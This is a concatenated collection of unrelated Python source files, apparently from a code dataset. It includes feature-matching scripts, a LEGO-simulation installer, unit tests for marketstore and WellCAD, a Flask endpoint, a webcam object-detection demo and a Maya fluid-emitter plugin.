parser.add_argument('--seqs', type=str, default='Fountain',
help='split by .')
parser.add_argument('--img_glob', type=str, default='*',
help='Glob match if directory of images is specified (default: \'*.png\').')
parser.add_argument('--input_suffix', type=str, default='sift-8000',
help='prefix of filename.')
parser.add_argument('--output_suffix', type=str, default='sift-8000-our',
help='prefix of filename.')
parser.add_argument('--use_prev_pairs', type=str2bool, default=False,
help='use previous image pairs')
parser.add_argument('--prev_output_suffix', type=str, default='sift-8000',
help='previous image pairs suffix')
parser.add_argument('--inlier_threshold', type=float, default=0,
help='inlier threshold. default: 0')
parser.add_argument('--use_learned_matcher', type=str2bool, default=True,
help='False: learned matcher, True: NN matcher')
parser.add_argument('--use_mutual', type=int, default=2,
help='0: not use mutual. 1: use mutual before learned matcher. 2: use mutual as side information')
parser.add_argument('--use_ratio', type=int, default=2,
help='0: not use ratio test. 1: use ratio test before learned matcher. 2: use ratio test as side information')
def dump_match(matcher, img1_name, img2_name, base_dir, input_suffix, output_suffix):
kpt1_name = os.path.join(base_dir, 'keypoints', img1_name+'.'+input_suffix+'.bin')
kpt2_name = os.path.join(base_dir, 'keypoints', img2_name+'.'+input_suffix+'.bin')
desc1_name = os.path.join(base_dir, 'descriptors', img1_name+'.'+input_suffix+'.bin')
desc2_name = os.path.join(base_dir, 'descriptors', img2_name+'.'+input_suffix+'.bin')
kpt1, kpt2 = read_keypoints(kpt1_name), read_keypoints(kpt2_name)
desc1, desc2 = read_descriptors(desc1_name), read_descriptors(desc2_name)
match_name = img1_name+'---'+img2_name+'.'+output_suffix+'.bin'
match_name = os.path.join(base_dir, 'matches', match_name)
matches, _, _ = matcher.infer([kpt1, kpt2], [desc1, desc2])
write_matches(match_name, matches)
if __name__ == "__main__":
opt = parser.parse_args()
seqs = opt.seqs.split('.')
if not opt.use_learned_matcher:
matcher = NNMatcher()
else:
if opt.use_ratio < 2 and opt.use_mutual < 2:
model_path = os.path.join('../model', 'sift-8k/model_best.pth')
matcher = LearnedMatcher(model_path, opt.inlier_threshold, use_ratio=opt.use_ratio, use_mutual=opt.use_mutual)
elif opt.use_ratio == 2 and opt.use_mutual == 2:
model_path = os.path.join('../model', 'sift-side-8k/model_best.pth')
matcher = LearnedMatcher(model_path, opt.inlier_threshold, use_ratio=2, use_mutual=2)
else:
raise NotImplementedError
for seq in seqs:
if not os.path.exists(opt.input_path+seq+'/matches'):
os.system('mkdir '+opt.input_path+seq+'/matches')
if not opt.use_prev_pairs:
# get image lists
search = os.path.join(opt.input_path, seq, 'images', opt.img_glob)
listing = glob.glob(search)
listing.sort()
pairs = []
for img1 in range(len(listing)):
for img2 in range(len(listing))[img1+1:]:
img1_name, img2_name = listing[img1].split('/')[-1], listing[img2].split('/')[-1]
pairs += [[img1_name, img2_name]]
else:
search = os.path.join(opt.input_path, seq, 'matches', "*---*."+opt.prev_output_suffix+'.bin')
listing = glob.glob(search)
pairs = [os.path.basename(path[:-5-len(opt.prev_output_suffix)]).split("---") for path in listing]
for pair in tqdm(pairs):
img1_name, img2_name = pair[0], pair[1]
dump_match(matcher, img1_name, img2_name, os.path.join(opt.input_path, seq), opt.input_suffix, opt.output_suffix)
| nilq/baby-python | python |
class WrongState(Exception):
def __init__(self, value, sessionState=None):
self.value = value
self.state = sessionState
def __str__(self):
return repr(self.value)
| nilq/baby-python | python |
from django.shortcuts import render
from .models import Chat
from .serializers import ChatSerializer
from rest_framework import viewsets
# Create your views here.
class ChatViewSet(viewsets.ModelViewSet):
serializer_class = ChatSerializer
queryset = Chat.objects.all() | nilq/baby-python | python |
import os
import shutil
import requests
import zipfile
import bz2
import tarfile
from splendor.home import get_splendor_home
from splendor.assets import install_assets
from splendor.download import download, agree_to_zip_licenses
import ltron.settings as settings
from ltron.home import get_ltron_home, make_ltron_home
from ltron.license import ldcad_license_text
ltron_home = get_ltron_home()
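# Each installer below downloads a third-party dependency into the LTRON home
# directory, asking for license agreement where required before extracting.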
def install_ldraw(overwrite=False):
print('='*80)
print('Installing LDraw')
make_ltron_home()
print('-'*80)
complete_zip_path = os.path.join(ltron_home, 'complete.zip')
downloaded_path = download(
settings.urls['ldraw'],
complete_zip_path,
overwrite=overwrite,
)
print('-'*80)
print('Checking for Licenses')
if agree_to_zip_licenses(complete_zip_path):
print('Extracting Contents To: %s'%ltron_home)
with zipfile.ZipFile(complete_zip_path, 'r') as z:
z.extractall(ltron_home)
else:
print('Must agree to all licensing. Aborting LDraw install.')
def ldcad_license_agreement():
print('LDCad is a necessary component of LTRON '
'and is provided under the following license:')
print(ldcad_license_text)
print('Agree? (y/n)')
yn = input()
return yn in 'yY'
def install_ldcad(overwrite=True):
print('='*80)
print('Installing LDCad')
make_ltron_home()
print('-'*80)
# download
ldcad_url = settings.urls['ldcad']
ldcad_bz2_filename = ldcad_url.split('/')[-1]
ldcad_bz2_path = os.path.join(ltron_home, ldcad_bz2_filename)
download(ldcad_url, ldcad_bz2_path, overwrite=overwrite)
print('-'*80)
if not ldcad_license_agreement():
        print('Must agree to all licensing. Aborting LDCad install.')
return False
# unbz2
ldcad_tar_path = ldcad_bz2_path.replace('.bz2', '')
print('-'*80)
print('Extracting bz2 archive to: %s'%ldcad_tar_path)
with open(ldcad_bz2_path, 'rb') as f_in:
data = bz2.decompress(f_in.read())
with open(ldcad_tar_path, 'wb') as f_out:
f_out.write(data)
# untar
ldcad_path = ldcad_tar_path.replace('.tar', '')
print('-'*80)
print('Extracting tar archive to: %s'%ldcad_path)
with tarfile.open(ldcad_tar_path, 'r:') as f:
f.extractall(ltron_home)
# unzip shadow
print('-'*80)
print('Unzipping shadow')
shadow_seed_path = os.path.join(ldcad_path, 'seeds', 'shadow.sf')
ldcad_shadow_path = os.path.join(ldcad_path, 'shadow')
if not os.path.exists(ldcad_shadow_path):
os.makedirs(ldcad_shadow_path)
with zipfile.ZipFile(shadow_seed_path, 'r') as z:
z.extractall(ldcad_shadow_path)
# unzip offLib
print('-'*80)
print('Unzipping offLibShadow')
ldcad_offlibshadow_csl_path = os.path.join(
ldcad_shadow_path, 'offLib', 'offLibShadow.csl')
ldcad_offlibshadow_path = os.path.join(
ldcad_shadow_path, 'offLib', 'offLibShadow')
if not os.path.exists(ldcad_offlibshadow_path):
os.makedirs(ldcad_offlibshadow_path)
with zipfile.ZipFile(ldcad_offlibshadow_csl_path, 'r') as z:
z.extractall(ldcad_offlibshadow_path)
def install_collection(name, overwrite=False):
print('='*80)
print('Installing %s Data Collection'%name)
print('-'*80)
zip_path = os.path.join(settings.paths['collections'], '%s.zip'%name)
download(settings.urls[name], zip_path, overwrite=overwrite)
print('-'*80)
print('Extracting collection %s'%name)
extract_path = os.path.join(settings.paths['collections'], name)
if not os.path.exists(extract_path) or overwrite:
with zipfile.ZipFile(zip_path, 'r') as z:
z.extractall(settings.paths['collections'])
else:
print('Already extracted.')
def install_splendor_meshes(resolution, overwrite=False):
print('='*80)
print('Installing Splendor Meshes (%s)'%resolution)
print('-'*80)
asset_name = 'ltron_assets_%s'%resolution
install_assets(settings.urls[asset_name], asset_name, overwrite=overwrite)
splendor_home = get_splendor_home()
resolution_path = os.path.join(splendor_home, asset_name)
resolution_cfg_path = resolution_path + '.cfg'
generic_cfg_path = os.path.join(splendor_home, 'ltron_assets.cfg')
if os.path.exists(generic_cfg_path):
os.unlink(generic_cfg_path)
os.symlink(resolution_cfg_path, generic_cfg_path)
#generic_path = os.path.join(splendor_home, 'ltron_assets')
#if os.path.exists(generic_path):
# os.unlink(generic_path)
#os.symlink(resolution_path, generic_path)
default_settings_cfg = '''
[DEFAULT]
datasets = {HOME}/datasets
collections = {HOME}/collections
[paths]
ldraw = {HOME}/ldraw
ldcad = {HOME}/LDCad-1-6d-Linux
shadow = %(ldcad)s/shadow
shadow_ldraw = %(shadow)s/offLib/offLibShadow
[datasets]
random_six = %(collections)s/random_six/random_six.json
#snap_one = %(collections)s/snap_one/snap_one.json
#snap_one_frames = %(collections)s/snap_one/snap_one_frames.json
#snap_four = %(collections)s/snap_four/snap_four.json
#snap_four_frames = %(collections)s/snap_four/snap_four_frames.json
#conditional_snap_two = %(collections)s/conditional_snap_two/conditional_snap_two.json
#conditional_snap_two_frames = %(collections)s/conditional_snap_two/conditional_snap_two_frames.json
[collections]
omr = %(collections)s/omr
random_six = %(collections)s/random_six
#snap_one = %(collections)s/snap_one
#snap_four = %(collections)s/snap_four
#conditional_snap_two = %(collections)s/conditional_snap_two
[urls]
ltron = https://github.com/aaronwalsman/ltron
ldraw = http://www.ldraw.org/library/updates/complete.zip
ldcad = http://www.melkert.net/action/download/LDCad-1-6d-Linux.tar.bz2
ldcad_home = http://www.melkert.net/LDCad
omr_ldraw = https://omr.ldraw.org
omr = https://drive.google.com/uc?id=1nr3uut3QK2qCzRm3VjYKc4HNgsum8hLf
random_six = https://drive.google.com/uc?id=11K6Zu59aU7EXRcsY_ALcOJG1S2aXcVXz
ltron_assets_low = https://drive.google.com/uc?id=11p_vyeL_B_BK7gupI8_JvGGbffJ2kXiG
ltron_assets_high = https://drive.google.com/uc?id=1wIw-0YXx9QkQ9Kjpcvv5XsZFqdZrGj6U
'''
def make_settings_cfg(overwrite=False):
settings_path = os.path.join(ltron_home, 'settings.cfg')
if not os.path.exists(settings_path) or overwrite:
print('Writing default settings file to: %s'%settings_path)
with open(settings_path, 'w') as f:
f.write(default_settings_cfg)
else:
print('Settings file already exists: %s'%settings_path)
| nilq/baby-python | python |
# Prepare U-Net training data
from scipy import ndimage as ndi
import numpy
import cv2
MASK_MARGIN = 5
def make_mask(v_center, v_diam, width, height):
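    # Return a height x width binary mask set to 1 inside a disc of radius
    # 2*v_diam around v_center, limited to a MASK_MARGIN-padded bounding box.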
mask = numpy.zeros([height, width])
v_xmin = numpy.max([0, int(v_center[0] - v_diam) - MASK_MARGIN])
v_xmax = numpy.min([width - 1, int(v_center[0] + v_diam) + MASK_MARGIN])
v_ymin = numpy.max([0, int(v_center[1] - v_diam) - MASK_MARGIN])
v_ymax = numpy.min([height - 1, int(v_center[1] + v_diam) + MASK_MARGIN])
v_xrange = range(v_xmin, v_xmax + 1)
v_yrange = range(v_ymin, v_ymax + 1)
for v_x in v_xrange:
for v_y in v_yrange:
p_x = v_x
p_y = v_y
if numpy.linalg.norm(numpy.array([v_center[0], v_center[1]])\
- numpy.array([p_x, p_y]))<= v_diam * 2:
                    mask[p_y, p_x] = 1.0  # set pixels inside the nodule region to 1
return mask
if __name__ == '__main__':
imagePath = './data/chaper3_img_01.png'
    # read the image as a grayscale array
img = cv2.imread(imagePath, cv2.IMREAD_GRAYSCALE)
print('before resize: ', img.shape)
    img_X = ndi.interpolation.zoom(img, [320/512, 320/512], mode='nearest')  # resized to 320x320
print('after resize: ', img_X.shape)
# cv2.imwrite('./temp_dir/chapter3_img_XX.png', img_X)
    img_Y = make_mask((217, 160), 3, 320, 320)  # nodule centre/diameter come from the annotation file
img_Y[img_Y < 0.5] = 0
img_Y[img_Y > 0.5] = 255
nodule_mask = img_Y.astype('uint8')
# cv2.imwrite('./temp_dir/chapter3_img_Y.png', img_Y)
| nilq/baby-python | python |
import numpy as np
import pymarketstore as pymkts
try:
from unittest.mock import patch
except ImportError:
from mock import patch
from pymarketstore.proto import marketstore_pb2_grpc
from pymarketstore.proto.marketstore_pb2 import MultiQueryRequest, QueryRequest
def test_grpc_client_init():
c = pymkts.GRPCClient("127.0.0.1:5995")
assert c.endpoint == "127.0.0.1:5995"
assert isinstance(c.stub, marketstore_pb2_grpc.MarketstoreStub)
@patch('pymarketstore.proto.marketstore_pb2_grpc.MarketstoreStub')
def test_query(stub):
# --- given ---
c = pymkts.GRPCClient()
p = pymkts.Params('BTC', '1Min', 'OHLCV')
# --- when ---
c.query(p)
# --- then ---
assert c.stub.Query.called == 1
@patch('pymarketstore.proto.marketstore_pb2_grpc.MarketstoreStub')
def test_create(stub):
# --- given ---
c = pymkts.GRPCClient()
dtype = [('Epoch', 'i8'), ('Bid', 'f4'), ('Ask', 'f4')]
tbk = 'TEST/1Min/TICK'
# --- when ---
c.create(tbk=tbk, dtype=dtype, isvariablelength=False)
# --- then ---
assert c.stub.Create.called == 1
@patch('pymarketstore.proto.marketstore_pb2_grpc.MarketstoreStub')
def test_write(stub):
# --- given ---
c = pymkts.GRPCClient()
data = np.array([(1, 0)], dtype=[('Epoch', 'i8'), ('Ask', 'f4')])
tbk = 'TEST/1Min/TICK'
# --- when ---
c.write(data, tbk)
# --- then ---
assert c.stub.Write.called == 1
def test_build_query():
# --- given ---
c = pymkts.GRPCClient(endpoint="127.0.0.1:5995")
p = pymkts.Params('TSLA', '1Min', 'OHLCV', 1500000000, 4294967296)
# --- when ---
query = c.build_query([p])
# --- then ---
assert query == MultiQueryRequest(
requests=[QueryRequest(destination="TSLA/1Min/OHLCV", epoch_start=1500000000, epoch_end=4294967296)])
@patch('pymarketstore.proto.marketstore_pb2_grpc.MarketstoreStub')
def test_list_symbols(stub):
# --- given ---
c = pymkts.GRPCClient()
# --- when ---
c.list_symbols()
# --- then ---
assert c.stub.ListSymbols.called == 1
@patch('pymarketstore.proto.marketstore_pb2_grpc.MarketstoreStub')
def test_destroy(stub):
# --- given ---
c = pymkts.GRPCClient()
tbk = 'TEST/1Min/TICK'
# --- when ---
c.destroy(tbk)
# --- then ---
assert c.stub.Destroy.called == 1
@patch('pymarketstore.proto.marketstore_pb2_grpc.MarketstoreStub')
def test_server_version(stub):
# --- given ---
c = pymkts.GRPCClient()
# --- when ---
c.server_version()
# --- then ---
assert c.stub.ServerVersion.called == 1
| nilq/baby-python | python |
import unittest
import pathlib
import wellcad.com
from ._extra_asserts import ExtraAsserts
from ._sample_path import SamplePath
class TestLithoPattern(unittest.TestCase, ExtraAsserts, SamplePath):
@classmethod
def setUpClass(cls):
cls.app = wellcad.com.Application()
cls.sample_path = cls._find_sample_path()
cls.borehole = cls.app.open_borehole(str(cls.sample_path / "Core Description.wcl"))
cls.litho_log = cls.borehole.get_log("lithology")
cls.dict = cls.litho_log.litho_dictionary
cls.pattern = cls.dict.litho_pattern(0)
@classmethod
def tearDownClass(cls):
cls.app.quit(False)
def test_code(self):
self.assertAttrEqual(self.pattern, "code", '#5')
def test_description(self):
self.assertAttrEqual(self.pattern, "description", 'Sand Color')
def test_width(self):
self.assertAlmostEqual(self.pattern.width, 20, 3)
def test_height(self):
self.assertAlmostEqual(self.pattern.height, 20, 3)
def test_repeatable(self):
self.assertEqual(self.pattern.repeatable, True)
if __name__ == '__main__':
unittest.main()
| nilq/baby-python | python |
import os
from flask_apispec import MethodResource
from flask_apispec import doc
from flask_jwt_extended import jwt_required
from flask_restful import Resource
from decorator.catch_exception import catch_exception
from decorator.log_request import log_request
from decorator.verify_admin_access import verify_admin_access
class GetMailContent(MethodResource, Resource):
def __init__(self, db):
self.db = db
@log_request
@doc(tags=['mail'],
description='Get the HTML content of the specified mail template name (new_account or reset_password)',
responses={
"200": {},
"404": {"description": "This mail template does not exist"},
})
@jwt_required
@verify_admin_access
@catch_exception
def get(self, name):
if name in ["new_account", "reset_password"]:
with open(os.path.join(os.path.dirname(__file__), "..", "..", "template", f"{name}.html"), "r") as f:
data = f.read()
else:
return "", "404 This mail template does not exist"
return data, "200 "
| nilq/baby-python | python |
"""
mbed CMSIS-DAP debugger
Copyright (c) 2006-2015 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import sys
from struct import unpack
INPUT_FILENAME = sys.argv[1]
OUTPUT_FILENAME = sys.argv[2]
with open(INPUT_FILENAME, "rb") as f:
data = f.read()
words = len(data) // 4
if len(data) % 4 != 0:
print("Warning: input length not word aligned")
str = "<L%i" % words
print("Data length %i" % len(data))
data = unpack("<%iL" % words, data)
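# Emit the words as a Python tuple literal named 'analyzer', eight values per line.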
str = "analyzer = (\n "
count = 0
for val in data:
if count % 8 == 7:
str += "0x{:08x},\n ".format(val)
else:
str += "0x{:08x}, ".format(val)
count += 1
str += "\n )"
data = str
with open(OUTPUT_FILENAME, "w") as f:
f.write(data)
| nilq/baby-python | python |
#!/usr/bin/env python
import cv2
from argparse import ArgumentParser
from time import time
from core.detectors import CornerNet_Saccade, CornerNet_Squeeze
from core.vis_utils import draw_bboxes
def main(args):
cam = cv2.VideoCapture(args.device)
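    # Request a specific capture pixel format from the camera via its FOURCC code.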
if args.codec == 'YUY2':
cam.set(cv2.CAP_PROP_FOURCC, 844715353.0)
elif args.codec == 'MJPG':
cam.set(cv2.CAP_PROP_FOURCC, 0x47504A4D)
else:
print('use default video codec.')
if args.resolution:
cam.set(cv2.CAP_PROP_FRAME_WIDTH, args.resolution[0])
cam.set(cv2.CAP_PROP_FRAME_HEIGHT,args.resolution[1])
detector = CornerNet_Squeeze(model_name=args.model) if args.model else CornerNet_Squeeze()
frame_count = 0
init_time = time()
tic = time()
try:
while True:
# Capture frame-by-frame
if cam.grab():
_, frame = cam.retrieve()
bboxes = detector(frame)
frame = draw_bboxes(frame, bboxes)
toc = time()
frame_count += 1
else:
continue
# Calculate fps
if toc - init_time > 3:
fps = frame_count / (toc - tic)
print('{:.2f}: {} x {} @ {:5.1f}'.format(time(), frame.shape[1], frame.shape[0], fps))
if toc -tic > 3:
tic = time()
frame_count = 0
# Show the resulting frame
if args.visual:
frame = cv2.resize(frame, (0, 0), fx=args.scale, fy=args.scale)
cv2.imshow('/dev/video{}'.format(args.device), frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
except KeyboardInterrupt:
print('\nKeyboardInterrupt')
pass
# When everything done, release the capture
cam.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('-d', '--device', help='device number: /dev/video#', type=int, default=0)
parser.add_argument('-c', '--codec', help='video codec: MJPG/YUY2')
parser.add_argument('-v', '--visual', action='store_true', dest='visual', help='Show image frame')
parser.add_argument('-r', '--resolution', nargs='+', type=float, help='resolution: w, h')
parser.add_argument('-s', '--scale', type=float, help='output frame scale: [0.25]', default=0.25)
parser.add_argument('-m', '--model', type=str, help='model name')
args = parser.parse_args()
main(args)
| nilq/baby-python | python |
import maya.cmds as cmds
import maya.api.OpenMaya as apiOpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
import json
import os
import math
import sys
import re
import struct
from collections import OrderedDict
from copy import deepcopy
import maya.OpenMaya as OpenMaya
######################################################
# PluginFunctions
######################################################
class PluginFunctions():
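    # Static helper methods shared by the plugin: node lookup by SPH_Type,
    # transform queries, and attribute/parameter construction.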
######################################################
# getAllNodesOfType
######################################################
@staticmethod
def getAllNodesOfType(typeId):
list = cmds.ls( type='transform', long=True )
result = []
for node in list:
# find type attribute
sphAttr = cmds.listAttr(node, string="SPH_Type")
if sphAttr != None:
sphtype = cmds.getAttr(node + ".SPH_Type")
if typeId == sphtype:
result.append(node)
return result
######################################################
# getShape
######################################################
@staticmethod
def getShape(nodeName):
return cmds.listRelatives(nodeName, shapes=True, type="shape")
######################################################
# get quaternion of a transform node
######################################################
@staticmethod
def getQuaternion(node):
sel_list = apiOpenMaya.MSelectionList()
sel_list.add(node)
obj = sel_list.getDependNode(0)
xform = apiOpenMaya.MFnTransform(obj)
quat = xform.rotation(asQuaternion=True)
quat.normalizeIt()
return quat
######################################################
# get axis,angle of a transform node
######################################################
@staticmethod
def getAxisAngle(node):
sel_list = apiOpenMaya.MSelectionList()
sel_list.add(node)
obj = sel_list.getDependNode(0)
xform = apiOpenMaya.MFnTransform(obj)
quat = xform.rotation(asQuaternion=True)
quat.normalizeIt()
aa = quat.asAxisAngle()
return ([aa[0][0], aa[0][1], aa[0][2]], aa[1])
@staticmethod
def createFloatAttr(longName, shortName, defaultValue, softMin, softMax, minValue=0, maxValue=1000000):
nAttr = OpenMaya.MFnNumericAttribute()
newAttr = nAttr.create( longName, shortName, OpenMaya.MFnNumericData.kFloat, defaultValue )
nAttr.setStorable(1)
nAttr.setMin(minValue)
nAttr.setMax(maxValue)
nAttr.setSoftMin(softMin)
nAttr.setSoftMax(softMax)
return newAttr
@staticmethod
def createIntAttr(longName, shortName, defaultValue, softMin, softMax, minValue=0, maxValue=1000000):
nAttr = OpenMaya.MFnNumericAttribute()
newAttr = nAttr.create( longName, shortName, OpenMaya.MFnNumericData.kInt, defaultValue )
nAttr.setStorable(1)
nAttr.setMin(minValue)
nAttr.setMax(maxValue)
nAttr.setSoftMin(softMin)
nAttr.setSoftMax(softMax)
return newAttr
@staticmethod
def createBoolAttr(longName, shortName, defaultValue):
nAttr = OpenMaya.MFnNumericAttribute()
newAttr = nAttr.create( longName, shortName, OpenMaya.MFnNumericData.kBoolean, defaultValue )
nAttr.setStorable(1)
return newAttr
@staticmethod
def createVec3Attr(longName, shortName, defaultValue):
nAttr = OpenMaya.MFnNumericAttribute()
newAttr = nAttr.create( longName, shortName, OpenMaya.MFnNumericData.k3Float )
nAttr.setDefault(defaultValue[0], defaultValue[1], defaultValue[2])
nAttr.setStorable(1)
return newAttr
@staticmethod
def createColorAttr(longName, shortName, defaultValue):
nAttr = OpenMaya.MFnNumericAttribute()
newAttr = nAttr.createColor( longName, shortName )
nAttr.setDefault(defaultValue[0], defaultValue[1], defaultValue[2])
nAttr.setStorable(1)
return newAttr
@staticmethod
def createVec3iAttr(longName, shortName, defaultValue):
nAttr = OpenMaya.MFnNumericAttribute()
newAttr = nAttr.create( longName, shortName, OpenMaya.MFnNumericData.k3Int )
nAttr.setDefault(defaultValue[0], defaultValue[1], defaultValue[2])
nAttr.setStorable(1)
return newAttr
@staticmethod
def createEnumAttr(longName, shortName, defaultValue, enumList):
eAttr = OpenMaya.MFnEnumAttribute()
newAttr = eAttr.create( longName, shortName, defaultValue)
        for i, item in enumerate(enumList):
            eAttr.addField(item, i)
eAttr.setStorable(1)
return newAttr
@staticmethod
def createStringAttr(longName, shortName, defaultValue):
nAttr = OpenMaya.MFnTypedAttribute()
sData = OpenMaya.MFnStringData()
default = sData.create(defaultValue)
newAttr = nAttr.create( longName, shortName, OpenMaya.MFnData.kString, default )
nAttr.setStorable(1)
return newAttr
######################################################
# createBoolParam
######################################################
@staticmethod
def createBoolParam(name, label, description, defaultValue):
param = {
"type": "bool",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"ctrlId": None
}
return param
######################################################
# createFloatParam
######################################################
@staticmethod
def createFloatParam(name, label, description, defaultValue, minValue, maxValue, fieldMin=0, fieldMax=1000000):
param = {
"type": "float",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"min": minValue,
"max": maxValue,
"fieldMin": fieldMin,
"fieldMax": fieldMax,
"ctrlId": None
}
return param
######################################################
# createVec3Param
######################################################
@staticmethod
def createVec3Param(name, label, description, defaultValue):
param = {
"type": "vec3",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"ctrlId": None
}
return param
######################################################
# createColorParam
######################################################
@staticmethod
def createColorParam(name, label, description, defaultValue):
param = {
"type": "color",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"ctrlId": None
}
return param
######################################################
# createVec3iParam
######################################################
@staticmethod
def createVec3iParam(name, label, description, defaultValue):
param = {
"type": "vec3i",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"ctrlId": None
}
return param
######################################################
# createIntParam
######################################################
@staticmethod
def createIntParam(name, label, description, defaultValue, minValue, maxValue, fieldMin=0, fieldMax=1000000):
param = {
"type": "int",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"min": minValue,
"max": maxValue,
"fieldMin": fieldMin,
"fieldMax": fieldMax,
"ctrlId": None
}
return param
######################################################
# createStringParam
######################################################
@staticmethod
def createStringParam(name, label, description, defaultValue):
param = {
"type": "string",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"ctrlId": None
}
return param
######################################################
# createEnumParam
######################################################
@staticmethod
def createEnumParam(name, label, description, defaultValue, enumList):
param = {
"type": "enum",
"name": name,
"label": label,
"description": description,
"default": defaultValue,
"value": defaultValue,
"enumList": enumList,
"ctrlId": None
}
return param
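    # Illustrative example (comment only, not executed): each factory above
    # returns a plain dict that later drives attribute creation, e.g.
    #   createFloatParam("viscosity", "Viscosity coefficient",
    #                    "Coefficient for the viscosity force computation.",
    #                    0.01, 0, 1000)
    # yields
    #   {"type": "float", "name": "viscosity", "label": "Viscosity coefficient",
    #    "description": "Coefficient for the viscosity force computation.",
    #    "default": 0.01, "value": 0.01, "min": 0, "max": 1000,
    #    "fieldMin": 0, "fieldMax": 1000000, "ctrlId": None}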
######################################################
# getSelectedTransforms
# get all selected transform nodes recursively
######################################################
@staticmethod
def getSelectedTransforms():
        selection = cmds.ls( selection=True, type='transform', long=True )
        transformNodes = []
        for item in selection:
transformNodes.append(item)
children = cmds.listRelatives(item, ad=True, type="transform")
if children == None:
continue
for child in children:
transformNodes.append(child)
return transformNodes
######################################################
# createCircularEmitter
######################################################
class createCircularEmitterCmd(OpenMayaMPx.MPxCommand):
s_name = "createCircularEmitter"
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def creator():
return createCircularEmitterCmd()
def doIt(self, args):
self.redoIt()
def redoIt(self):
self.cyl = cmds.polyCylinder(name="CircularEmitter", r=1, h=0.2, sx=20, sy=1, sz=1, ax=[1,0,0], rcp=0, cuv=3, ch=1)
cmds.delete(ch=True)
node = self.cyl[0]
cmds.delete(node + ".f[40:59]")
cmds.scale(0.5, 0.5, 0.5, self.cyl[0])
# set type
cmds.addAttr(node, longName="SPH_Type", niceName="type",dt="string", hidden=True)
cmds.setAttr((node + '.SPH_Type'), "CircularEmitter", type="string")
        # velocity
        cmds.addAttr(node, longName="SPH_velocity", niceName="velocity", at="float")
        cmds.setAttr((node + '.SPH_velocity'), 1.0)
        # start time
        cmds.addAttr(node, longName="SPH_startTime", niceName="start time", at="float")
        cmds.setAttr((node + '.SPH_startTime'), 0.0)
        # end time
        cmds.addAttr(node, longName="SPH_endTime", niceName="end time", at="float")
        cmds.setAttr((node + '.SPH_endTime'), 100000.0)
# fluid id
cmds.addAttr(node, longName="SPH_fluidId", niceName="Fluid id", dt="string")
cmds.setAttr((node + '.SPH_fluidId'), "Fluid", type="string")
def undoIt(self):
pass
def isUndoable(self):
return True
######################################################
# RectangularEmitter
######################################################
class createRectangularEmitterCmd(OpenMayaMPx.MPxCommand):
s_name = "createRectangularEmitter"
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def creator():
return createRectangularEmitterCmd()
def doIt(self, args):
self.redoIt()
def redoIt(self):
self.cube = cmds.polyCube(name="RectangularEmitter", w=0.2, h=1, d=1, sx=1, sy=1, sz=1, ch=1)
cmds.delete(ch=True)
node = self.cube[0]
cmds.delete(node + ".f[4]")
# set type
cmds.addAttr(node, longName="SPH_Type", niceName="type",dt="string", hidden=True)
cmds.setAttr((node + '.SPH_Type'), "RectangularEmitter", type="string")
        # velocity
        cmds.addAttr(node, longName="SPH_velocity", niceName="velocity", at="float")
        cmds.setAttr((node + '.SPH_velocity'), 1.0)
        # start time
        cmds.addAttr(node, longName="SPH_startTime", niceName="start time", at="float")
        cmds.setAttr((node + '.SPH_startTime'), 0.0)
        # end time
        cmds.addAttr(node, longName="SPH_endTime", niceName="end time", at="float")
        cmds.setAttr((node + '.SPH_endTime'), 100000.0)
# fluid id
cmds.addAttr(node, longName="SPH_fluidId", niceName="Fluid id", dt="string")
cmds.setAttr((node + '.SPH_fluidId'), "Fluid", type="string")
def undoIt(self):
pass
def isUndoable(self):
return True
######################################################
# AnimationField
######################################################
class createAnimationFieldCmd(OpenMayaMPx.MPxCommand):
s_name = "createAnimationField"
s_shortTypeFlag = '-s'
s_longTypeFlag = '-shape'
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def syntaxCreator():
syntax = OpenMaya.MSyntax()
syntax.addFlag( createAnimationFieldCmd.s_shortTypeFlag, createAnimationFieldCmd.s_longTypeFlag, OpenMaya.MSyntax.kLong )
return syntax
@staticmethod
def creator():
return createAnimationFieldCmd()
def doIt(self, args):
argData = OpenMaya.MArgParser( self.syntax(), args )
self.shapeType = 0
if argData.isFlagSet( createAnimationFieldCmd.s_shortTypeFlag ):
self.shapeType = argData.flagArgumentInt(createAnimationFieldCmd.s_shortTypeFlag, 0)
self.redoIt()
def redoIt(self):
poly = ""
if self.shapeType == 1:
poly = cmds.polySphere(name="AnimationField", r=1, sx=20, sy=20, ax=[0,1,0], cuv=2, ch=1)
cmds.expression(s=poly[0] + ".scaleY=" + poly[0] + ".scaleZ=" + poly[0] + ".scaleX;", o=poly[0])
elif self.shapeType == 2:
poly = cmds.polyCylinder(name="AnimationField", r=1, h=1, sx=20, sy=1, ax=[1,0,0], cuv=3, rcp=0, ch=1)
cmds.expression(s=poly[0] + ".scaleZ=" + poly[0] + ".scaleY;", o=poly[0])
else:
poly = cmds.polyCube(name="AnimationField", w=1, h=1, d=1, sx=1, sy=1, sz=1, ch=1)
cmds.delete(ch=True)
node = poly[0]
# set type
cmds.addAttr(node, longName="SPH_shapeType", niceName="shape type", at="long", hidden=True)
cmds.setAttr((node + '.SPH_shapeType'), self.shapeType)
# set type
cmds.addAttr(node, longName="SPH_Type", niceName="type",dt="string", hidden=True)
cmds.setAttr((node + '.SPH_Type'), "AnimationField", type="string")
# set particle field
cmds.addAttr(node, longName="SPH_particleField", niceName="paricle field",dt="string")
